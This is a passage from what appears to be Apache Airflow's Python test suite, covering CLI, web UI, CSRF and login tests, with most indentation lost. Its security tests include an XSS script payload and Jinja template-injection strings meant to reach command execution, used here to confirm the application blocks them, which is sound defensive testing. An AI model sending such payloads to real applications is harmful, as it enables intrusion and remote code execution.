# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_uri or conn_type']"),
])
        # Prepare to verify the connections added above
session = settings.Session()
extra = {'new1': None,
'new2': None,
'new3': "{'extra': 'yes'}",
'new4': "{'extra': 'yes'}"}
        # Verify the added connections
for index in range(1, 6):
conn_id = 'new%s' % index
result = (session
.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
result = (result.conn_id, result.conn_type, result.host,
result.port, result.get_extra())
if conn_id in ['new1', 'new2', 'new3', 'new4']:
self.assertEqual(result, (conn_id, 'postgres', 'host', 5432,
extra[conn_id]))
elif conn_id == 'new5':
self.assertEqual(result, (conn_id, 'hive_metastore', 'host',
9083, None))
elif conn_id == 'new6':
self.assertEqual(result, (conn_id, 'google_cloud_platform',
None, None, "{'extra': 'yes'}"))
# Delete connections
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new1']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new2']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new3']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new4']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new5']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new6']))
stdout = mock_stdout.getvalue()
# Check deletion stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tSuccessfully deleted `conn_id`=new1",
"\tSuccessfully deleted `conn_id`=new2",
"\tSuccessfully deleted `conn_id`=new3",
"\tSuccessfully deleted `conn_id`=new4",
"\tSuccessfully deleted `conn_id`=new5",
"\tSuccessfully deleted `conn_id`=new6"
])
# Check deletions
for index in range(1, 7):
conn_id = 'new%s' % index
result = (session.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
self.assertTrue(result is None)
        # Attempt to delete a non-existent connection
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tDid not find a connection with `conn_id`=fake",
])
# Attempt to delete with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake',
'--conn_uri=%s' % uri, '--conn_type=fake-type']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--delete flag: ['conn_uri', 'conn_type']"),
])
session.close()
def test_cli_test(self):
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0', '--dry_run',
DEFAULT_DATE.isoformat()]))
def test_cli_test_with_params(self):
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'also_run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
def test_cli_run(self):
cli.run(self.parser.parse_args([
'run', 'example_bash_operator', 'runme_0', '-l',
DEFAULT_DATE.isoformat()]))
def test_task_state(self):
cli.task_state(self.parser.parse_args([
'task_state', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
def test_dag_state(self):
self.assertEqual(None, cli.dag_state(self.parser.parse_args([
'dag_state', 'example_bash_operator', DEFAULT_DATE.isoformat()])))
def test_pause(self):
args = self.parser.parse_args([
'pause', 'example_bash_operator'])
cli.pause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [True, 1])
args = self.parser.parse_args([
'unpause', 'example_bash_operator'])
cli.unpause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [False, 0])
def test_subdag_clear(self):
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm'])
cli.clear(args)
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm', '--exclude_subdags'])
cli.clear(args)
def test_parentdag_downstream_clear(self):
args = self.parser.parse_args([
'clear', 'example_subdag_operator.section-1', '--no_confirm'])
cli.clear(args)
args = self.parser.parse_args([
'clear', 'example_subdag_operator.section-1', '--no_confirm',
'--exclude_parentdag'])
cli.clear(args)
def test_get_dags(self):
dags = cli.get_dags(self.parser.parse_args(['clear', 'example_subdag_operator',
'-c']))
self.assertEqual(len(dags), 1)
dags = cli.get_dags(self.parser.parse_args(['clear', 'subdag', '-dx', '-c']))
self.assertGreater(len(dags), 1)
with self.assertRaises(AirflowException):
cli.get_dags(self.parser.parse_args(['clear', 'foobar', '-dx', '-c']))
def test_backfill(self):
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-t', 'runme_0', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-l',
'-s', DEFAULT_DATE.isoformat()]))
def test_process_subdir_path_with_placeholder(self):
self.assertEqual(os.path.join(settings.DAGS_FOLDER, 'abc'), cli.process_subdir('DAGS_FOLDER/abc'))
def test_trigger_dag(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'-c', '{"foo": "bar"}']))
self.assertRaises(
ValueError,
cli.trigger_dag,
self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'--run_id', 'trigger_dag_xxx',
'-c', 'NOT JSON'])
)
def test_delete_dag(self):
DM = models.DagModel
key = "my_dag_id"
session = settings.Session()
session.add(DM(dag_id=key))
session.commit()
cli.delete_dag(self.parser.parse_args([
'delete_dag', key, '--yes']))
self.assertEqual(session.query(DM).filter_by(dag_id=key).count(), 0)
self.assertRaises(
AirflowException,
cli.delete_dag,
self.parser.parse_args([
'delete_dag',
'does_not_exist_dag',
'--yes'])
)
def test_pool_create(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
self.assertEqual(self.session.query(models.Pool).count(), 1)
def test_pool_get(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
try:
cli.pool(self.parser.parse_args(['pool', '-g', 'foo']))
except Exception as e:
self.fail("The 'pool -g foo' command raised unexpectedly: %s" % e)
def test_pool_delete(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
cli.pool(self.parser.parse_args(['pool', '-x', 'foo']))
self.assertEqual(self.session.query(models.Pool).count(), 0)
def test_pool_no_args(self):
try:
cli.pool(self.parser.parse_args(['pool']))
except Exception as e:
self.fail("The 'pool' command raised unexpectedly: %s" % e)
def test_pool_import_export(self):
# Create two pools first
pool_config_input = {
"foo": {
"description": "foo_test",
"slots": 1
},
"baz": {
"description": "baz_test",
"slots": 2
}
}
with open('pools_import.json', mode='w') as f:
json.dump(pool_config_input, f)
# Import json
try:
cli.pool(self.parser.parse_args(['pool', '-i', 'pools_import.json']))
except Exception as e:
self.fail("The 'pool -i pools_import.json' failed: %s" % e)
# Export json
try:
cli.pool(self.parser.parse_args(['pool', '-e', 'pools_export.json']))
except Exception as e:
self.fail("The 'pool -e pools_export.json' failed: %s" % e)
with open('pools_export.json', mode='r') as f:
pool_config_output = json.load(f)
self.assertEqual(
pool_config_input,
pool_config_output,
"Input and output pool files are not same")
os.remove('pools_import.json')
os.remove('pools_export.json')
def test_variables(self):
# Checks if all subcommands are properly received
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"bar"}']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'foo']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'baz', '-d', 'bar']))
cli.variables(self.parser.parse_args([
'variables']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'bar']))
cli.variables(self.parser.parse_args([
'variables', '-i', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-e', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'original']))
# First export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables1.json']))
first_exp = open('variables1.json', 'r')
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'updated']))
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"oops"}']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'foo']))
# First import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables1.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
# Second export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables2.json']))
second_exp = open('variables2.json', 'r')
self.assertEqual(first_exp.read(), second_exp.read())
second_exp.close()
first_exp.close()
# Second import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables2.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
os.remove('variables1.json')
os.remove('variables2.json')
def _wait_pidfile(self, pidfile):
while True:
try:
with open(pidfile) as f:
return int(f.read())
            except (IOError, ValueError):
                # The PID file may not exist yet or may still be empty; retry.
                sleep(1)
def test_cli_webserver_foreground(self):
# Confirm that webserver hasn't been launched.
# pgrep returns exit status 1 if no process matched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in foreground and terminate it.
p = subprocess.Popen(["airflow", "webserver"])
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_foreground_with_pid(self):
# Run webserver in foreground with --pid option
pidfile = tempfile.mkstemp()[1]
p = subprocess.Popen(["airflow", "webserver", "--pid", pidfile])
# Check the file specified by --pid option exists
self._wait_pidfile(pidfile)
# Terminate webserver
p.terminate()
p.wait()
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_background(self):
import psutil
# Confirm that webserver hasn't been launched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in background.
subprocess.Popen(["airflow", "webserver", "-D"])
pidfile = cli.setup_locations("webserver")[0]
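        # setup_locations()[0] is the path of the webserver's PID file.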
self._wait_pidfile(pidfile)
# Assert that gunicorn and its monitor are launched.
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Terminate monitor process.
pidfile = cli.setup_locations("webserver-monitor")[0]
pid = self._wait_pidfile(pidfile)
p = psutil.Process(pid)
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
    # Patch to force the webserver to time out
@mock.patch("airflow.bin.cli.get_num_workers_running", return_value=0)
def test_cli_webserver_shutdown_when_gunicorn_master_is_killed(self, _):
        # Shorten the timeout so that this test doesn't take too long
configuration.conf.set("webserver", "web_server_master_timeout", "10")
args = self.parser.parse_args(['webserver'])
with self.assertRaises(SystemExit) as e:
cli.webserver(args)
self.assertEqual(e.exception.code, 1)
class SecurityTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def test_csrf_rejection(self):
endpoints = ([
"/admin/queryview/",
"/admin/airflow/paused?dag_id=example_python_operator&is_paused=false",
])
for endpoint in endpoints:
response = self.app.post(endpoint)
self.assertIn('CSRF token is missing', response.data.decode('utf-8'))
def test_csrf_acceptance(self):
response = self.app.get("/admin/queryview/")
csrf = self.get_csrf(response)
response = self.app.post("/admin/queryview/", data=dict(csrf_token=csrf))
self.assertEqual(200, response.status_code)
def test_xss(self):
try:
self.app.get("/admin/airflow/tree?dag_id=<script>alert(123456)</script>")
        except Exception:
            # an exception is expected here since the DAG doesn't exist
            pass
response = self.app.get("/admin/log", follow_redirects=True)
self.assertIn(bleach.clean("<script>alert(123456)</script>"), response.data.decode('UTF-8'))
def test_chart_data_template(self):
"""Protect chart_data from being able to do RCE."""
session = settings.Session()
Chart = models.Chart
chart1 = Chart(
label='insecure_chart',
conn_id='airflow_db',
chart_type='bar',
sql="SELECT {{ ''.__class__.__mro__[1].__subclasses__() }}"
)
chart2 = Chart(
label="{{ ''.__class__.__mro__[1].__subclasses__() }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
chart3 = Chart(
label="{{ subprocess.check_output('ls') }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
session.add(chart1)
session.add(chart2)
session.add(chart3)
session.commit()
chart1 = session.query(Chart).filter(Chart.label == 'insecure_chart').first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart1.id))
chart2 = session.query(Chart).filter(
Chart.label == "{{ ''.__class__.__mro__[1].__subclasses__() }}"
).first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart2.id))
chart3 = session.query(Chart).filter(
Chart.label == "{{ subprocess.check_output('ls') }}"
).first()
with self.assertRaises(UndefinedError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart3.id))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
class WebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
app.config['WTF_CSRF_METHODS'] = []
self.app = app.test_client()
self.dagbag = models.DagBag(include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.dag_python = self.dagbag.dags['example_python_operator']
self.sub_dag = self.dagbag.dags['example_subdag_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.example_xcom = self.dagbag.dags['example_xcom']
self.dagrun_python = self.dag_python.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.sub_dag.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.example_xcom.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
def test_index(self):
response = self.app.get('/', follow_redirects=True)
resp_html = response.data.decode('utf-8')
self.assertIn("DAGs", resp_html)
self.assertIn("example_bash_operator", resp_html)
        # The HTML should contain data for the last run: a link to the specific
        # run and the text of its date.
url = "/admin/airflow/graph?" + urlencode({
"dag_id": self.dag_python.dag_id,
"execution_date": self.dagrun_python.execution_date,
        }).replace("&", "&amp;")  # '&' is HTML-escaped in the rendered page
self.assertIn(url, resp_html)
self.assertIn(
self.dagrun_python.execution_date.strftime("%Y-%m-%d %H:%M"),
resp_html)
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertIn("Ad Hoc Query", response.data.decode('utf-8'))
response = self.app.post(
"/admin/queryview/", data=dict(
conn_id="airflow_db",
sql="SELECT+COUNT%281%29+as+TEST+FROM+task_instance"))
self.assertIn("TEST", response.data.decode('utf-8'))
def test_health(self):
response = self.app.get('/health')
self.assertIn('The server is healthy!', response.data.decode('utf-8'))
def test_noaccess(self):
response = self.app.get('/admin/airflow/noaccess')
self.assertIn("You don't seem to have access.", response.data.decode('utf-8'))
def test_pickle_info(self):
response = self.app.get('/admin/airflow/pickle_info')
self.assertIn('{', response.data.decode('utf-8'))
def test_dag_views(self):
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
# confirm that the graph page loads when execution_date is blank
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator&execution_date=')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tree?num_runs=25&dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/duration?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tries?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_python_operator')
self.assertIn("example_python_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_xcom')
self.assertIn("example_xcom", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/gantt?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/code?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/blocked')
response = self.app.get(
'/admin/configurationview/')
self.assertIn("Airflow Configuration", response.data.decode('utf-8'))
self.assertIn("Running Configuration", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/rendered?'
'task_id=runme_1&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_ISO))
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/log?task_id=run_this_last&'
'dag_id=example_bash_operator&execution_date={}'
''.format(DEFAULT_DATE_ISO))
self.assertIn("run_this_last", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task?'
'task_id=runme_0&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_DS))
self.assertIn("Attributes", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=print_the_context&"
"dag_id=example_python_operator&upstream=false&downstream=false&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
response = self.app.get(
'/admin/airflow/clear?task_id=print_the_context&'
'dag_id=example_python_operator&future=true&past=false&'
'upstream=true&downstream=false&'
'execution_date={}&'
'origin=/admin'.format(DEFAULT_DATE_DS))
self.assertIn("Wait a minute", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=section-1&"
"dag_id=example_subdag_operator&upstream=true&downstream=true&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
self.assertIn("section-1-task-1", response.data.decode('utf-8'))
self.assertIn("section-1-task-2", response.data.decode('utf-8'))
self.assertIn("section-1-task-3", response.data.decode('utf-8'))
self.assertIn("section-1-task-4", response.data.decode('utf-8'))
self.assertIn("section-1-task-5", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/clear?task_id=print_the_context&"
"dag_id=example_python_operator&future=false&past=false&"
"upstream=false&downstream=true&"
"execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/clear?task_id=section-1-task-1&"
"dag_id=example_subdag_operator.section-1&future=false&past=false&"
"upstream=false&downstream=true&recursive=true&"
"execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.end",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-1.section-1-task-1",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-1",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-1",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-2",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-3",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-4",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-5",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.some-other-task",
response.data.decode('utf-8'))
url = (
"/admin/airflow/run?task_id=runme_0&"
"dag_id=example_bash_operator&ignore_all_deps=false&ignore_ti_state=true&"
"ignore_task_deps=true&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
response = self.app.get(
"/admin/airflow/refresh?dag_id=example_bash_operator")
response = self.app.get("/admin/airflow/refresh_all")
response = self.app.post(
"/admin/airflow/paused?"
"dag_id=example_python_operator&is_paused=false")
self.assertIn("OK", response.data.decode('utf-8'))
response = self.app.get("/admin/xcom", follow_redirects=True)
self.assertIn("Xcoms", response.data.decode('utf-8'))
def test_charts(self):
session = Session()
chart_label = "Airflow task instance by type"
chart = session.query(
models.Chart).filter(models.Chart.label == chart_label).first()
chart_id = chart.id
session.close()
response = self.app.get(
'/admin/airflow/chart'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("Airflow task instance by type", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/chart_data'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("example", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_details?dag_id=example_branch_operator')
self.assertIn("run_this_first", response.data.decode('utf-8'))
def test_fetch_task_instance(self):
url = (
"/admin/airflow/object/task_instances?"
"dag_id=example_python_operator&"
"execution_date={}".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("print_the_context", response.data.decode('utf-8'))
def test_dag_view_task_with_python_operator_using_partial(self):
response = self.app.get(
'/admin/airflow/task?'
'task_id=test_dagrun_functool_partial&dag_id=test_task_view_type_check&'
'execution_date={}'.format(DEFAULT_DATE_DS))
self.assertIn("A function with two args", response.data.decode('utf-8'))
def test_dag_view_task_with_python_operator_using_instance(self):
response = self.app.get(
'/admin/airflow/task?'
'task_id=test_dagrun_instance&dag_id=test_task_view_type_check&'
'execution_date={}'.format(DEFAULT_DATE_DS))
self.assertIn("A __call__ method", response.data.decode('utf-8'))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
session = Session()
session.query(models.DagRun).delete()
session.query(models.TaskInstance).delete()
session.commit()
session.close()
class SecureModeWebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("core", "secure_mode", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertEqual(response.status_code, 404)
def test_charts(self):
response = self.app.get('/admin/chart/')
self.assertEqual(response.status_code, 404)
def tearDown(self):
configuration.conf.remove_option("core", "SECURE_MODE")
class PasswordUserTest(unittest.TestCase):
def setUp(self):
user = models.User()
from airflow.contrib.auth.backends.password_auth import PasswordUser
self.password_user = PasswordUser(user)
self.password_user.username = "password_test"
@mock.patch('airflow.contrib.auth.backends.password_auth.generate_password_hash')
def test_password_setter(self, mock_gen_pass_hash):
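        # The mocked hash is bytes on Python 3 and str on Python 2, matching
        # what flask-bcrypt's generate_password_hash returns.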
mock_gen_pass_hash.return_value = b"hashed_pass" if six.PY3 else "hashed_pass"
self.password_user.password = "secure_password"
mock_gen_pass_hash.assert_called_with("secure_password", 12)
def test_password_unicode(self):
        # In Python 2.7 no conversion back to str is required; in Python 3
        # the setter must convert the hashed bytes back to str.
self.password_user.password = "secure_password"
self.assertIsInstance(self.password_user.password, str)
def test_password_user_authenticate(self):
self.password_user.password = "secure_password"
self.assertTrue(self.password_user.authenticate("secure_password"))
def test_password_authenticate_session(self):
from airflow.contrib.auth.backends.password_auth import PasswordUser
self.password_user.password = 'test_password'
session = Session()
session.add(self.password_user)
session.commit()
query_user = session.query(PasswordUser).filter_by(
username=self.password_user.username).first()
self.assertTrue(query_user.authenticate('test_password'))
session.query(models.User).delete()
session.commit()
session.close()
class WebPasswordAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.password_auth")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
from airflow.contrib.auth.backends.password_auth import PasswordUser
session = Session()
user = models.User()
password_user = PasswordUser(user)
password_user.username = 'airflow_passwordauth'
password_user.password = 'password'
print(password_user._password)
session.add(password_user)
session.commit()
session.close()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_password_auth(self):
self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'whatever')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'wrongpassword')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'password')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized_password_auth(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class WebLdapAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
        except Exception:
            # the "ldap" section may already exist
            pass
configuration.conf.set("ldap", "uri", "ldap://openldap:389")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_ldap(self):
self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'userx')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('userz', 'user1')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def test_no_filter(self):
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
self.assertIn('Connections', response.data.decode('utf-8'))
def test_with_filters(self):
configuration.conf.set('ldap', 'superuser_filter',
'description=superuser')
configuration.conf.set('ldap', 'data_profiler_filter',
'description=dataprofiler')
response = self.login('dataprofiler', 'dataprofiler')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
response = self.login('superuser', 'superuser')
self.assertIn('Connections', response.data.decode('utf-8'))
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
